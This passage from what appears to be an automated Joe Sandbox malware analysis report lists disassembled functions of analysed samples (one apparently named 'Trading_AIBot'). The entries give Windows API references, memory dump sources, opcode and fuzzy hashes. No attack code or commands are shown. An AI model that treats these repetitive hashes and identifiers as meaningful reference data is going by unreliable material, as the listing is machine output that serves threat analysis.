                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008635D5
                                                                                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008635E7
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 008635F0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 008632FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0086332C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a7a979447928dea41ec74ca267eeaa86f661b4bfa70e0a917f3c746613609b2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8980d02057c7b2521abc024b3a61246a785c394e44082f7e71af43821a7e3f0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a7a979447928dea41ec74ca267eeaa86f661b4bfa70e0a917f3c746613609b2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91319E72A0021AABDF259F68EC49DAE7BA5FF41710F064129FC06D7250EB35CE94CB91
                                                                                                                                                                                                                                                                                                                                  Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                                                                                                                                  Function 0086218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008615D8,00000000,00000000,?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue), ref: 008621BD
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue,00876FC4,FlsSetValue,00000000,00000364,?,0086192D), ref: 008621C9
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue,00876FC4,FlsSetValue,00000000), ref: 008621D7
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d727892dd96a951fc207f67c4d9a999eccfe931d42802968b6c664a6a9af18b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ad804517962b52174c161c41cbd0da77e028aff78a647ca7cde860fea365534a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d727892dd96a951fc207f67c4d9a999eccfe931d42802968b6c664a6a9af18b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101A772605A36ABC7214B68EC44E567BD8FF47BA5B230660FA16E7240D760ED01CAF0
                                                                                                                                                                                                                                                                                                                                  Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 01037A7B Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40b01172e65b1f2956efe0ceb9b84c4763a383d69eff9ab0f65797ff0ab065a5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42a4d988648b99a4191edc29c3ff5494ddad6cd89a069500a31f75257925340b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40b01172e65b1f2956efe0ceb9b84c4763a383d69eff9ab0f65797ff0ab065a5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A671D074D00219CFCB14EFA4D980AADBBB6FF89300F208569D4497B264DB356E8ACF50
                                                                                                                                                                                                                                                                                                                                  Function 01037A88 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32652d004a3711884d6e1c4da01fa8cfe7826a1227d85f82a66a1f53939b036a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 198f951f7d66f568c69d6ce8211b1ad25fd9c4311c99b6996a00d0b4321a1960
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32652d004a3711884d6e1c4da01fa8cfe7826a1227d85f82a66a1f53939b036a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9561D074D00219CFCB14EFA4D990AADBBB6FF89300F208569D449BB264DB356D8ACF50
                                                                                                                                                                                                                                                                                                                                  Function 01037188 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dbef7fc1086ed44d88541dedc672272a62b85835ba308996bda869564b235258
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3d9bdbe3922428bfc4af06b5574b3cdae414fbc4294fac5dfca04d46e8581e8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbef7fc1086ed44d88541dedc672272a62b85835ba308996bda869564b235258
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5661C378A00248CFCB44DFA9D594A9DBBF2FF89710F109069E909AB365DB31AC06CF14
                                                                                                                                                                                                                                                                                                                                  Function 01037E56 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af2579fe7a85805a119694b6fdab2ce8575e891b14f0aca9f54411c698d8cbde
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 490a99498fd8c2cf5bce7876e3974bf6b7c0266b1a01ce47fde030e9af7983e9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2579fe7a85805a119694b6fdab2ce8575e891b14f0aca9f54411c698d8cbde
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441C9B4D00248DFDB14DFAAC884ADEFFB9BF89300F24802AE458AB254D7349946CF54
                                                                                                                                                                                                                                                                                                                                  Function 01037E58 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e35a21c10e61b864f68fe8ec3343b7df65a4b9dd4144ff61cd475507e281737a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c55ce54514d9b083caffcf4ea6f3f43a2153b6695fcfaece880bd73ac665e5bb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e35a21c10e61b864f68fe8ec3343b7df65a4b9dd4144ff61cd475507e281737a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1941CAB4D00248DFDB14DFAAC884A9EFFF9BF89300F14802AE458AB254D7349846CF54
                                                                                                                                                                                                                                                                                                                                  Function 010378FB Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Jdq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1891755625
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7af843cf84b3da21468bb046d840b70c9b7a652d4eb5121bb8c4543e7d463fe4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cf90cc8acfe546041191fa94b30704f41fa89f7dd510482ace49c85d89ef5a81
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af843cf84b3da21468bb046d840b70c9b7a652d4eb5121bb8c4543e7d463fe4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241D475E402089FDB04DFA9D994AEEBBF2FF89301F108069E515B72A0DB359905CF90
                                                                                                                                                                                                                                                                                                                                  Function 01037900 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Jdq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1891755625
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fb5080ef223f5fefb54f5699a795c0129d1f2832ca5e56d243a96a4efc027c4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a28b998dfc4b6da05bce023c9fbcd44f8170d235b328dd0029032ba3f5b099b0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fb5080ef223f5fefb54f5699a795c0129d1f2832ca5e56d243a96a4efc027c4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A41E574E002089FDB04DFA9D994AEEBBF2FF89301F108069E515B72A0DB359905CF54
                                                                                                                                                                                                                                                                                                                                  Function 01035353 Relevance: .9, Instructions: 935COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b319f7ecb0508878ab1e57da517c33bd3ca3623aa82cbc57c0385441b953281
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3704d294de50ce22cdb99285c4d1c5e8dbc09795fd7ca40bb7897e57b019d3be
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b319f7ecb0508878ab1e57da517c33bd3ca3623aa82cbc57c0385441b953281
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52B29F70A01229CFCB65EF64C894A9DBBB2FF89704F5085E9D44DAB264DB319E81CF41
                                                                                                                                                                                                                                                                                                                                  Function 01035358 Relevance: .9, Instructions: 935COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e287df79843bf389a193b1301f0a123067bd528acbce5b819be08ea5cc321f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ed3595cc32de74c33afd6bcc46cdeddd33d4fc4c574d37a8605b73892645412
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e287df79843bf389a193b1301f0a123067bd528acbce5b819be08ea5cc321f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1B2AE70A01229CFCB65EF64C894A9DBBB2FF89704F5085E9D44DAB264DB319E81CF41
                                                                                                                                                                                                                                                                                                                                  Function 01030839 Relevance: .6, Instructions: 603COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 76435f9d7abfe2f0bb83302bcef96c26069e84818b0bb4aa9bf7e0aad46aeb66
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fb7bb38fe70a223e51226d27d6aebfb8b200dcb1c6ecbf25d5bad36c76f20ef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76435f9d7abfe2f0bb83302bcef96c26069e84818b0bb4aa9bf7e0aad46aeb66
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B62AB70A01229CFCB65DF64D994B9DBBF2BB89700F1084E9D40AAB365DB309E85CF41
                                                                                                                                                                                                                                                                                                                                  Function 01030848 Relevance: .6, Instructions: 601COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 767ea0c8b851d938f91ca8bdf46d9f50592405ae1a9ba3d44ac311402de53fb3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a4ae4c2b369ab8dc5e16924ad5d930f3a797b91536b9277f34c0eef1d54815a5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 767ea0c8b851d938f91ca8bdf46d9f50592405ae1a9ba3d44ac311402de53fb3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B62BB70A01229CFCB65DF64D994B9DBBF2BB89700F1084E9D40AAB365DB709E85CF41
                                                                                                                                                                                                                                                                                                                                  Function 010367F0 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2be7110ee4ee0582851b172b8b48b8fa839d0d669698b0eafeca8e4925b5034b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 799a2b6de24b3219960675fa543e9e31779c5a769d581d29abf0e97a12e195d9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2be7110ee4ee0582851b172b8b48b8fa839d0d669698b0eafeca8e4925b5034b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84B1DC74A012288FDB64DF68D984B9DB7F2BB89304F1085E9D80DA7251DB31AE85CF51
                                                                                                                                                                                                                                                                                                                                  Function 010365C0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bfe14268abcc755c9b6dcefabc8df78d69de7ece8fc21ea629194acab1d83481
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fca8680e802c707988880f7697978cab3dddebe47ef63d74011e204561a37568
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe14268abcc755c9b6dcefabc8df78d69de7ece8fc21ea629194acab1d83481
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6641CF78D04308DFDB45DFA9D4946EDBBF5BB89300F10802AE469AB394EB355946CF50
                                                                                                                                                                                                                                                                                                                                  Function 01037CF6 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bfbc952b00958c2b601c89b4cc27a935d8cd5a66e0dace2c7debbc9852cdfbc9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f59be3621896306a08a6793eff76da61964505311f763cb79ff50cf889c1cac
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfbc952b00958c2b601c89b4cc27a935d8cd5a66e0dace2c7debbc9852cdfbc9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE4100B1D052889FDB15DFA9C884ADDBFF5AF89300F14806AD458AB261D7345846CF50
                                                                                                                                                                                                                                                                                                                                  Function 01037D08 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
